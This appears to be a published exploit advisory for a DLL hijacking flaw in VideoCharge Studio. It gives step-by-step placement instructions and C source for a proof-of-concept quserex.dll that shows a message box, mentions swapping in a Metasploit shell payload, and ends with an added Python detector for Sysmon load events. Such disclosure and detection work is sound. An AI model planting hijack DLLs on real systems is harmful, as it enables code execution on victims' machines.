VideoCharge Studio suffers from a DLL hijacking vulnerability.
# Exploit Title: VideoCharge Studio DLL Hijacking Exploit (quserex.dll)
# Date: 13-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.videocharge.com/
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Tested on: Windows 7
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: quserex.dll
vcstudio.exe will search for and load any DLL named "quserex.dll".
If an attacker can place the DLL in a location where the victim opens
vcstudio.exe, it will load and run the attacker's DLL and code.
An attacker can also generate a msfpayload DLL and spawn a shell, for example.
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:
1- Save and compile the C code below as 'quserex.dll' to create the vuln DLL
2- Place 'quserex.dll' in the same directory as vcstudio.exe
3- Open vcstudio.exe
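//gcc test.c -o quserex.dll -shared
//this DLL shows a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

/* Declared before use so DllMain does not rely on an implicit declaration. */
int dll_hijack(void);

/* Entry point the loader calls when the DLL is mapped into the process. */
BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    dll_hijack();
    return 0;
}

/* Proof of load only: shows a message box. */
int dll_hijack(void)
{
    MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
    return 0;
}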
#################################
Discovered By : Amir.ght #######
#################################
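
Detection side of the load described above, as an added example that is not part of the original advisory: it flags image-load records in which vcstudio.exe loads quserex.dll, and reports whether the DLL came from the application directory and whether it was unsigned. The records are constructed samples using Sysmon Event ID 7 field names; the EXAMPLE-* directories and the function names are assumptions.

```python
import ntpath

# Constructed sample records using Sysmon Event ID 7 (ImageLoad) field names.
# EXAMPLE-* directories are placeholders; the advisory gives no install path.
SAMPLE_EVENTS = r"""
Image: C:\EXAMPLE-INSTALL-DIR\vcstudio.exe
ImageLoaded: C:\EXAMPLE-INSTALL-DIR\QUserEx.dll
Signed: false

Image: C:\EXAMPLE-INSTALL-DIR\vcstudio.exe
ImageLoaded: C:\Windows\System32\kernel32.dll
Signed: true

Image: C:\EXAMPLE-INSTALL-DIR\vcstudio.exe
ImageLoaded: D:\EXAMPLE-MEDIA-DIR\quserex.dll
Signed: false
"""

WATCHED_PROCESS = "vcstudio.exe"  # loading process named in the advisory
WATCHED_DLL = "quserex.dll"       # DLL name named in the advisory


def parse_events(text):
    """Split blank-line separated 'Key: value' records into dicts."""
    events = []
    for block in text.strip().split("\n\n"):
        pairs = (line.partition(": ") for line in block.splitlines())
        fields = {k.strip(): v.strip() for k, sep, v in pairs if sep}
        if fields:
            events.append(fields)
    return events


def find_suspect_loads(events):
    """Flag loads of the watched DLL by the watched process, from any path."""
    hits = []
    for ev in events:
        image, loaded = ev.get("Image", ""), ev.get("ImageLoaded", "")
        # Windows file names are case-insensitive, so compare lowercased names.
        if (ntpath.basename(image).lower() != WATCHED_PROCESS
                or ntpath.basename(loaded).lower() != WATCHED_DLL):
            continue
        app_dir = ntpath.normcase(ntpath.dirname(image))
        hits.append({
            "path": loaded,
            "in_app_dir": ntpath.normcase(ntpath.dirname(loaded)) == app_dir,
            "unsigned": ev.get("Signed", "").lower() != "true",
        })
    return hits
```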